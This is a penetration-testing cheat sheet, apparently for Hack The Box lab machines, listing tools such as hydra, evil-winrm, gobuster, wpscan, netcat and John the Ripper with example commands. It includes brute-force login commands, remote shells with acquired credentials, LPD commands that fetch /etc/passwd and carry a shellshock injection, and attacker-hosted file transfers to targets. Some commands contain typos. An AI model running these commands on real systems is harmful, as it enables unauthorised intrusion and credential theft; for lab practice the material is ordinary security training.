adb (android debug tool)
#adb connect <IP>:5555
#adb shell
apktool
tool for reverse engineering android apk files
#apktool d -f -r filename.apk
base64 decode
This is how you translate base64 to readable
#echo "<base64 string>"== | base64 --decode
creating base64
#echo "string" | base64
there are online resources as well
base64encode.org
BurpSuite
verbose details here link
DIRB
Web Content Scanner looks for existing (and/or hidden) web objects. Primary function is launching a dictionary based attack against a web server and analyzing the response
Usage: #dirb http://zyz.htb -r -z 10
Dirbuster
GUI for Dirb. Very slick. Especially useful for
Usage: Open dirbuster application
-set number of threads
-set target including http:// or https://
-set wordlist
-set file extension
davtest
tool that tests uploading files to a webdav vulnerable webserver
Usage: #davtest -url http://<ip>
evil-winrm
windows remote managment shell
#gem install evil-winrm
#evil-winrm -i <IP> -u <username> -p '<password>'
available commands when successfull
upload/download/services/menu
use evil-winrm with acquired certificate and private key
#evil-winrm -i <IP> -S -c cert.crt -k priv.key -p -u
you will have to enter password for key(likely you have identified it or made your own)
fcrackzip
a free/Fast zip password cracker
Usage: #fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt <filename>.zip
-u = unzip
-D = Dictionary
-p = password string
finger-enum-user.pl
enumerating finger service
Usage: #./finger-user-enum.pl -U /opt/SecLists/Usernames/Names/names.txt -t 10.10.10.76
getcap
Examine file capabilities. Displays the name and capabilities of each specified file
Usage: #getcap -r /
usage: #getcap -r / 2>/dev/null
gobuster
similar to DIRB, a directory brute forcer
you will need to install it
#apt-get install gobuster
usage:
#gobuster dir -u http://10.10.10.10 -w /usr/share/wordlists/common.txt
"common.txt" at the location you see here was a special download, you can use whatever wordlist you want.
hydra
brute forcing tool
basic usage
#hydra -l <username> -P </usr/share/wordlists/rockyou.txt> <IP> -t 4 <service>
Brute force login on website
#hydra -s -V -L <user_wordlist> -P <pass_wordlist> admin.cronos.htb http-post-form "/:username=^USER^&password=^PASS^&:invalid"
impacket:
Installation:
#sudo apt-get install python3-pip
#sudo git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket
Navigate to /opt/impacket
#sudo python3 ./setup.py install
John the Ripper
Basic usage
#john --wordlist=/share/wordlists/rockyou.txt <file_name>
pfx get hash value
#pfx2john file.pfx > [output_file_name]
then go back to basic JTR usage and crack the hash
kubeletctl
Kubeletctl is a command line tool that implement kubelet's API.
typically port 10250
can discover through https://<IP>:10250
github repo
another good resource
installation:
#wget https://github.com/cyberark/kubeletctl/releases/download/v1.7/kubeletctl_linux_amd64 && chmod a+x ./kubeletctl_linux_amd64 && mv ./kubeletctl_linux_amd64 /usr/local/bin/kubeletctl
check pods
#kubeletctl pods -s <IP>
check running pods
#kubeletctl runningpods -s <IP>
ldapsearch
it is a ldap search tool (great resource)
check for null credentials
#ldapsearch -x -h <IP> -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
lpdprint.py
Line Print Daemon(LPD) runs on port 515/TCP. It is possible to send files, get files and even navigate the OS
check for null credentials
#lpdprint.py hostname filename
#lpdtest.py hostname get /etc/passwd
#lpdtest.py hostname put ../../etc/passwd
#lpdtest.py hostname rm /some/file/on/printer
#lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
#lpdtest.py hostname mail lpdtest@mailhost.local
netcat
swiss army knife of the internet
basic file transfer
receiver (works with images/zips/etc.)
#nc -nlvp 4444 > file.txt
sender
#nc <receiver_IP> 4444 < stuff_you_want_to_send.txt
nmblookup
NetBIOS over TCP/IP client used to lookup NetBIOS names
#nmblookup -A <IP>
nuclei
Nuclei is a vulnerability scanning tool developed by projectdiscovery that helps find security issues automatically based on simple YAML-based templates. This tool is highly customizable and helps in identifying vulnerabilities by scanning numerous protocols such as HTTP, DNS, TCP etc.
INITIAL SETUP
#apt-get install nuclei
#nuclei -u http://<IP> 130
openssl
cryptography toolkit implementing ssl v2/v3 and TLS v1 network protocols and related crypto standards (reference)
(see also on this page ssh2john)
Extract private key from pfx file
#openssl pkcs12 -in [yourfile.pfx] -nocerts -out [priv.key]
Extract the certificate
#openssl pkcs12 -in [yourfile.pfx] -clcerts -nokeys -out [cert.crt]
Decrypt private key
#openssl rsa -in [drlive.key] -out [decrypt_priv.key]
Python Webserver
An amazingly quick way to launch a web server so you can transfer files to the target fast!
Run the below command from the "attack" machine. Launch from the directory that contains the file you are wanting. (linpeas.sh, winpeas.sh etc.)
#python3 -m http.server 5050
Extract the certificate
#wget http://<attack_ip>:5050/linpeas.sh
pureFTPd
Used for transferring data between kali and target
INITIAL SETUP
On Kali
#apt-get install pure-ftpd
create ftp user
#useradd -g ftpgroup -d /dev/null -s /etc ftpuser
#pure-pw useradd jonny -u ftpuser -d /ftphome
#pure-pw mkdb
#cd /etc/pure-ftpd/auth/
#ln -S ../conf/PureDB 60pdb
inside /etc/pure-ftpd/auth
/etc/pure-ftpd/ > #mkdir -p /ftphome
#chown -R ftpuser:ftpgroup /ftphome/
#systemctl restart pure-ftpd
Check Status
#systemctl status pure-ftpd
USAGE
From target
#ftp <kali IP>
login and download
rpcinfo
typically the service rpcbind is found on port 111
tool makes an RPC call to an RPC server and reports what it finds
basic usage
#rpcinfo <IP>
RSACTFTOOL
cracking weak rsa with provided .pub key
#RsaCtfTool.py --publickey <key.pub> --uncipherfile <flag.enc>
rpclient
typically the service rpcbind is found on port 111
tool makes an RPC call to an RPC server and reports what it finds
basic usage-->check for Null Sessions
#rpcclient -U "" -N <IP>
SecLists
this is a user made archive of a TON of scripts and various tools. It's insane
download like so.
#wget -c https://github.com/danielmiessler/SecLists/archive/master.zip -O SecList.zip
#unzip SecList.zip
#rm -f SecList.zip
sublist3r
tool designed to enumerate subdomains of websites using OSINT
download like so.
#sublist3r -d domain.com
sherlock
Tool for enumerating social media for user names
You need to install it
Usage: #sherlock <username>
(it returns a lot!)
SimpleHTTPServer (Python)
Used for file transfers between attacker and target. Typically there is something on the target you want to plant
Usage: Attacker Machine: #python -w SimpleHTTPServer <port #>
Usage: Target: #wget http://<attackerIP>:<port>/<desired_file>
ssh2john
you have acquired a .rsa file. You need to convert this file to a hash
#ssh2john <filename that is rsa> > hash_output
#john --wordlist=/usr/share/wordlists/rockyou.txt hash_output
steghide
basic embedding:
#steghide embed -ef secretphrase.txt -cf image.jpeg
basic extraction:
#steghide extract -sf image.jpeg
enter password
output saved "pass.txt"
wafw00f
Identity and fingerprint Web Application Firewall products
sends a normal HTTP request and analyses the response; this identifies a number of WAF solutions. If that is not successful, it sends a number of HTTP requests and uses simple logic to deduce which WAF it is
basic usage:
#wafw00f http://<IP>
wpscan
scanner used for gathering information(vulns) on wordpress sites
basic usage
#wpscan --url htt://backdoor.htb
enumerate users
#wpscan --url http://backdoor.htb --enumerate u
deeper scan
#wpscan --url http://<IP> -e ap,t,tt,u
ap = all plugins
t= themes
tt=timthumbs
u=users
Brute Force Plugin discovery
#wpscan --url http:/backdoor.htb --plugins-detection aggressive -e ap
zipinfo
Gives you the properties of the zip file
basic usage:
#zipinfo -v <filename>.zip